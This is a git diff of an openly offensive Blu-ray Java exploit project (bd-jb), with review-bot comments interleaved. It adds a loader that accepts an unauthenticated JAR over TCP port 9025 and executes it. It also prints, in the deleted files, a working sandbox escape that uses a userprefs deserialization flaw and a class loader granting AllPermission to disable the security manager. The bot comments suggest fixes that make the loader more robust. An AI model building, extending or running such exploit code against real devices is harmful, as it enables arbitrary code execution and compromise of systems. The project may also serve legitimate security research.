diff --git a/Makefile b/Makefile
index a888512..db5e02f 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,12 @@ LIB = lib
SRC = src
TOOLS = tools
-CLASSES = \
- $(SRC)/com/bdjb/ExploitXlet.java \
+LOADER_CLASSES = \
+ $(SRC)/com/bdjb/LoaderXlet.java \
+ $(SRC)/com/bdjb/Loader.java \
+ $(SRC)/com/bdjb/Screen.java \
+
+EXPLOIT_CLASSES = \
$(SRC)/com/bdjb/Exploit.java \
$(SRC)/com/bdjb/Screen.java \
$(SRC)/com/bdjb/api/API.java \
@@ -25,39 +29,42 @@ CLASSES = \
$(SRC)/com/bdjb/jit/JitCompilerReceiverImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitDefaultImpl.java \
- $(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
- $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
-all: directory serialized classes jar bdjo_bdmv
+all: loader exploit
-directory:
+loader: build_directory loader_classes loader_jar loader_bdjo_bdmv
+
+exploit: build_directory exploit_classes exploit_jar
+
+build_directory:
mkdir -p $(BUILD)
-serialized:
- javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
- java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
- rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
+loader_classes:
+ javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(LOADER_CLASSES)
-classes:
- javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
+exploit_classes:
+ javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(EXPLOIT_CLASSES)
-jar:
- rm -rf $(BUILD)/jdk
+loader_jar:
mkdir -p $(DISC)/BDMV/JAR
- cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
+ cp $(SRC)/com/bdjb/bluray.LoaderXlet.perm $(BUILD)/com/bdjb/bluray.LoaderXlet.perm
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
-bdjo_bdmv:
+exploit_jar:
+ rm -rf $(BUILD)/jdk
+ cd $(BUILD) && jar cf 00000.jar . && cd ..
+
+loader_bdjo_bdmv:
mkdir -p $(DISC)/BDMV/BDJO
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
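Review bot: `exploit_jar` archives the whole `$(BUILD)` tree (`jar cf 00000.jar .`) after `loader_classes` and `loader_jar` have already populated that same directory, so under `all: loader exploit` the exploit JAR also carries `LoaderXlet.class`, `Loader.class` and `bluray.LoaderXlet.perm`, and because the output file is created inside the directory being archived it may even pick up a partial copy of itself. Give the two stages separate class directories (e.g. `javac -d $(BUILD)/exploit` and `cd $(BUILD)/exploit && jar cf ../00000.jar .`) or clear the tree between them. None of these step targets produce a file of their own name and their sequencing is only implied by prerequisite order, which `make -j` does not honour; add `.PHONY: all loader exploit build_directory loader_classes exploit_classes loader_jar exploit_jar loader_bdjo_bdmv` and chain them (`loader_jar: loader_classes`, `exploit_jar: exploit_classes`, `loader_classes exploit_classes: build_directory`). The `rm -rf $(BUILD)/jdk` that previously ran before jarring now lives only in `exploit_jar`, so if anything still drops a `jdk` directory into `$(BUILD)` it will be signed into the loader's `BDMV/JAR/00000.jar`.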
diff --git a/bdmv/bdjo.xml b/bdmv/bdjo.xml
index da6cc69..21e4266 100644
--- a/bdmv/bdjo.xml
+++ b/bdmv/bdjo.xml
@@ -15,7 +15,7 @@
0x0
- com.bdjb.ExploitXlet
+ com.bdjb.LoaderXlet
128
1
diff --git a/src/com/bdjb/Exploit.java b/src/com/bdjb/Exploit.java
index cedef3c..e7bc494 100644
--- a/src/com/bdjb/Exploit.java
+++ b/src/com/bdjb/Exploit.java
@@ -9,26 +9,16 @@ package com.bdjb;
import com.bdjb.exploit.kernel.ExploitKernelInterface;
import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
-import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.net.InetAddress;
-import java.net.ServerSocket;
-import java.net.Socket;
-
-class Exploit implements Runnable {
- static void init() {
- Screen.println("[+] bd-jb by theflow");
+import java.lang.reflect.Method;
+public class Exploit {
+ public static void main(Method screenPrintln) {
+ Screen.setRemotePrintln(screenPrintln);
Screen.println("[*] Escaping Java Sandbox...");
- Class[] sandboxExploits =
- new Class[] {
- ExploitDefaultImpl.class, ExploitUserPrefsImpl.class, ExploitServiceProxyImpl.class
- };
+ Class[] sandboxExploits = new Class[] {ExploitDefaultImpl.class, ExploitServiceProxyImpl.class};
for (int i = 0; i < sandboxExploits.length; i++) {
try {
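Review bot: The `ExploitKernelInterface` import kept as context at the top of this hunk is now dead — its only use was the kernel-exploit loop in `run()` that this commit deletes — and `-Xlint:all` does not flag unused imports, so drop `import com.bdjb.exploit.kernel.ExploitKernelInterface;`. The new `main(Method screenPrintln)` is not a conventional entry point but is invoked reflectively from a separately loaded JAR, which deserves a Javadoc such as "Entry point called by the loader Xlet through DVBClassLoader; screenPrintln is the loader-side static Screen.println(String) used to route this JAR's log lines to the on-screen console, or null to render locally." `main` continues past the end of this hunk (the loop over `sandboxExploits` is cut off here).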
@@ -46,29 +36,4 @@ class Exploit implements Runnable {
Screen.println("[-] Error could not disable security manager.");
}
}
-
- static void start() {
- new Thread(new Exploit()).start();
- }
-
- public void run() {
- if (System.getSecurityManager() != null) {
- return;
- }
-
- Screen.println("[*] Exploiting kernel...");
-
- Class[] kernelExploits = new Class[] {};
-
- for (int i = 0; i < kernelExploits.length; i++) {
- try {
- ExploitKernelInterface exploit = (ExploitKernelInterface) kernelExploits[i].newInstance();
- if (exploit.trigger()) {
- break;
- }
- } catch (Exception e) {
- continue;
- }
- }
- }
}
diff --git a/src/com/bdjb/Loader.java b/src/com/bdjb/Loader.java
new file mode 100644
index 0000000..6a83944
--- /dev/null
+++ b/src/com/bdjb/Loader.java
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license. See the LICENSE file for details.
+ */
+
+package com.bdjb;
+
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.ServerSocket;
+import java.net.Socket;
+import java.net.URL;
+import java.lang.reflect.Method;
+import org.dvb.lang.DVBClassLoader;
+
+class Loader implements Runnable {
+ private static final String MNT_ADA_JAR_FILE = "/OS/HDD/download0/mnt_ada/00000.jar";
+
+ private static final String EXPLOIT_CLASS_NAME = "com.bdjb.Exploit";
+ private static final String MAIN_METHOD_NAME = "main";
+ private static final String PRINTLN_METHOD_NAME = "println";
+
+ static void startJarLoader() {
+ new Thread(new Loader()).start();
+ }
+
+ public void run() {
+ Screen.println("[+] bd-jb by theflow");
+
+ while (true) {
+ Screen.println("[*] Listening for remote JAR on port 9025...");
+
+ try {
+ ServerSocket serverSocket = new ServerSocket(9025);
+ Socket socket = serverSocket.accept();
+ InputStream inputStream = socket.getInputStream();
+ OutputStream outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);
+
+ byte[] buf = new byte[8192];
+ int total = 0;
+ int read;
+ while ((read = inputStream.read(buf)) > 0) {
+ outputStream.write(buf, 0, read);
+ total += read;
+ }
+
+ outputStream.close();
+ inputStream.close();
+
+ serverSocket.close();
+
+ Screen.println("[+] Received " + total + " bytes");
+
+ Screen.println("[+] Launching JAR...");
+
+ DVBClassLoader dvbClassLoader =
+ DVBClassLoader.newInstance(new URL[] {new URL("file://" + MNT_ADA_JAR_FILE)});
+ Class exploitClass = dvbClassLoader.loadClass(EXPLOIT_CLASS_NAME);
+ Method main = exploitClass.getMethod(MAIN_METHOD_NAME, new Class[] {Method.class});
+ Method screenPrintln =
+ Screen.class.getMethod(PRINTLN_METHOD_NAME, new Class[] {String.class});
+ main.invoke(null, new Object[] {screenPrintln});
+
+ Screen.println("[+] JAR exited");
+ } catch (Exception e) {
+ Screen.println("[-] Error: " + e.getMessage());
+ }
+ }
+ }
+}
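Review bot: In `run()` the sockets are only released on the success path — all three `close()` calls sit inside the `try` — so if `accept()`, the copy loop or the `FileOutputStream` on `MNT_ADA_JAR_FILE` throws, `serverSocket` leaks, the next pass of `while (true)` fails at `new ServerSocket(9025)` with an address-in-use error, and the loop degenerates into a tight spin printing `[-] Error:` lines. Release everything in a `finally` (the build uses `-source 1.4`, so no try-with-resources), keep the early closes so the listener is still gone before the JAR runs, and log `e.getCause()` because an `InvocationTargetException` from `main.invoke` usually has a null `getMessage()`. The trust boundary should also be stated on the class: whoever connects first to TCP 9025 gets their bytes written to disk and executed through `DVBClassLoader` with no authentication or integrity check, which is acceptable for a research tool on an isolated network but worth a comment like `// NOTE: unauthenticated — any host that can reach port 9025 can run code inside this Xlet.`
```java
  public void run() {
    Screen.println("[+] bd-jb by theflow");

    while (true) {
      Screen.println("[*] Listening for remote JAR on port 9025...");

      ServerSocket serverSocket = null;
      Socket socket = null;
      OutputStream outputStream = null;
      try {
        serverSocket = new ServerSocket(9025);
        socket = serverSocket.accept();
        InputStream inputStream = socket.getInputStream();
        outputStream = new FileOutputStream(MNT_ADA_JAR_FILE);

        // … unchanged: copy loop, early close() calls, "[+] Received" / "[+] Launching JAR..." …

        // … unchanged: DVBClassLoader.newInstance, loadClass, getMethod, main.invoke …
      } catch (Exception e) {
        // InvocationTargetException wraps the JAR's own failure; its getMessage() is usually null.
        Throwable cause = (e.getCause() != null) ? e.getCause() : e;
        Screen.println("[-] Error: " + cause);
      } finally {
        // No-op on the success path (already closed above); on failure this is the only
        // thing that frees port 9025 for the next iteration of the loop.
        try { if (outputStream != null) outputStream.close(); } catch (Exception ignored) {}
        try { if (socket != null) socket.close(); } catch (Exception ignored) {}
        try { if (serverSocket != null) serverSocket.close(); } catch (Exception ignored) {}
      }
    }
  }
```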
diff --git a/src/com/bdjb/ExploitXlet.java b/src/com/bdjb/LoaderXlet.java
similarity index 91%
rename from src/com/bdjb/ExploitXlet.java
rename to src/com/bdjb/LoaderXlet.java
index 92bd947..9299dc5 100644
--- a/src/com/bdjb/ExploitXlet.java
+++ b/src/com/bdjb/LoaderXlet.java
@@ -13,13 +13,11 @@ import javax.tv.xlet.XletContext;
import org.havi.ui.HScene;
import org.havi.ui.HSceneFactory;
-public class ExploitXlet implements Xlet {
+public class LoaderXlet implements Xlet {
private HScene scene;
private Screen screen;
public void initXlet(XletContext context) {
- Exploit.init();
-
screen = Screen.getInstance();
screen.setSize(1920, 1080); // BD screen size
@@ -31,7 +29,7 @@ public class ExploitXlet implements Xlet {
public void startXlet() {
screen.setVisible(true);
scene.setVisible(true);
- Exploit.start();
+ Loader.startJarLoader();
}
public void pauseXlet() {
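Review bot: `startXlet()` spawns a fresh `Loader` thread on every call, and unlike the old `Exploit.run()`, which returned, `Loader.run()` now blocks on port 9025 indefinitely; if the BD-J runtime calls `startXlet()` again after `pauseXlet()` (which the Xlet lifecycle permits), the second thread cannot bind the port and will loop on that error. Guard the start with a static flag: add `private static boolean loaderStarted;` and change the call to `if (!loaderStarted) { loaderStarted = true; Loader.startJarLoader(); }`. `pauseXlet()` begins on the last line of this hunk and its body is outside it.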
diff --git a/src/com/bdjb/Screen.java b/src/com/bdjb/Screen.java
index c3443ad..b3e0c96 100644
--- a/src/com/bdjb/Screen.java
+++ b/src/com/bdjb/Screen.java
@@ -11,6 +11,7 @@ import java.awt.Color;
import java.awt.Container;
import java.awt.Font;
import java.awt.Graphics;
+import java.lang.reflect.Method;
import java.util.ArrayList;
public class Screen extends Container {
@@ -22,13 +23,27 @@ public class Screen extends Container {
private static final Screen instance = new Screen();
+ private static Method remoteScreenPrintln = null;
+
public static Screen getInstance() {
return instance;
}
+ public static void setRemotePrintln(Method screenPrintln) {
+ remoteScreenPrintln = screenPrintln;
+ }
+
public static void println(String msg) {
- messages.add(msg);
- instance.repaint();
+ if (remoteScreenPrintln != null) {
+ try {
+ remoteScreenPrintln.invoke(null, new Object[] {msg});
+ } catch (Exception e) {
+ // Ignore.
+ }
+ } else {
+ messages.add(msg);
+ instance.repaint();
+ }
}
public void paint(Graphics g) {
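Review bot: When the reflective call in `println` fails, the message is simply dropped — the catch marked `// Ignore.` neither logs nor falls back — and inside the remotely loaded JAR every `println` goes through `remoteScreenPrintln`, so a wrong or inaccessible `Method` blanks all of that JAR's output precisely when a diagnostic is needed. Fall back to the local path instead: replace the comment with `messages.add(msg); instance.repaint();`. `setRemotePrintln` also deserves a Javadoc stating that the target must be a static `println(String)` of a different `Screen` class (the loader's), since pointing it at this class's own `println` would call straight back into itself through `invoke`, and that passing `null` restores local rendering.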
diff --git a/src/com/bdjb/bluray.ExploitXlet.perm b/src/com/bdjb/bluray.LoaderXlet.perm
similarity index 100%
rename from src/com/bdjb/bluray.ExploitXlet.perm
rename to src/com/bdjb/bluray.LoaderXlet.perm
diff --git a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java b/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
deleted file mode 100644
index 3d1979e..0000000
--- a/src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java
+++ /dev/null
@@ -1,61 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.ObjectOutputStream;
-import java.io.OutputStream;
-import org.havi.ui.HSceneFactory;
-
-/** Implementation of the userprefs deserialization exploit. */
-public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
- private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
-
- private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
- "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
-
- public boolean trigger() throws Exception {
- try {
- // Overwrite userprefs with a serialized PayloadClassLoader.
- InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
- OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
-
- byte[] buf = new byte[8192];
- int read;
- while ((read = inputStream.read(buf)) > 0) {
- outputStream.write(buf, 0, read);
- }
-
- outputStream.close();
- inputStream.close();
-
- // Trigger deserialization vulnerability.
- try {
- HSceneFactory.getInstance().getDefaultHScene();
- } catch (ClassCastException e) {
- // Exception expected.
-
- // Instantiate the payload class.
- PayloadClassLoader.getInstance().newPayload();
-
- return System.getSecurityManager() == null;
- }
- } finally {
- // Restore userprefs file.
- String[][] preferences = new String[9][];
- preferences[3] = new String[] {"26"};
- ObjectOutputStream outputStream =
- new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
- outputStream.writeObject(preferences);
- outputStream.close();
- }
-
- return false;
- }
-}
diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
deleted file mode 100644
index cae2277..0000000
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoader.java
+++ /dev/null
@@ -1,57 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import java.io.ByteArrayOutputStream;
-import java.io.InputStream;
-import java.io.ObjectInputStream;
-import java.io.Serializable;
-import java.security.AllPermission;
-import java.security.Permissions;
-import java.security.ProtectionDomain;
-
-/** ClassLoader subclass that is instantiated on deserialization. */
-class PayloadClassLoader extends ClassLoader implements Serializable {
- private static final long serialVersionUID = 0x4141414141414141L;
-
- private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
- private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
-
- private static PayloadClassLoader instance;
-
- static PayloadClassLoader getInstance() {
- return instance;
- }
-
- private void readObject(ObjectInputStream stream) {
- instance = this;
- }
-
- void newPayload() throws Exception {
- InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_FILE);
- ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
-
- byte[] buf = new byte[8192];
- int read;
- while ((read = inputStream.read(buf)) > 0) {
- outputStream.write(buf, 0, read);
- }
-
- inputStream.close();
-
- byte[] payload = outputStream.toByteArray();
-
- // Instantiate the payload class with all permissions to disable the security manager.
- Permissions permissions = new Permissions();
- permissions.add(new AllPermission());
- ProtectionDomain protectionDomain = new ProtectionDomain(null, permissions);
- Class payloadClass =
- defineClass(PAYLOAD_CLASS_NAME, payload, 0, payload.length, protectionDomain);
- payloadClass.newInstance();
- }
-}
diff --git a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java b/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
deleted file mode 100644
index c985ae2..0000000
--- a/src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
+++ /dev/null
@@ -1,25 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license. See the LICENSE file for details.
- */
-
-package com.bdjb.exploit.sandbox;
-
-import com.bdjb.exploit.sandbox.PayloadClassLoader;
-import java.io.FileOutputStream;
-import java.io.ObjectOutputStream;
-
-/** Simple util to create a serialized object of the PayloadClassLoader class. */
-class PayloadClassLoaderSerializer {
- public static void main(String[] args) {
- try {
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
- objectOutputStream.writeObject(new PayloadClassLoader());
- objectOutputStream.close();
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
-}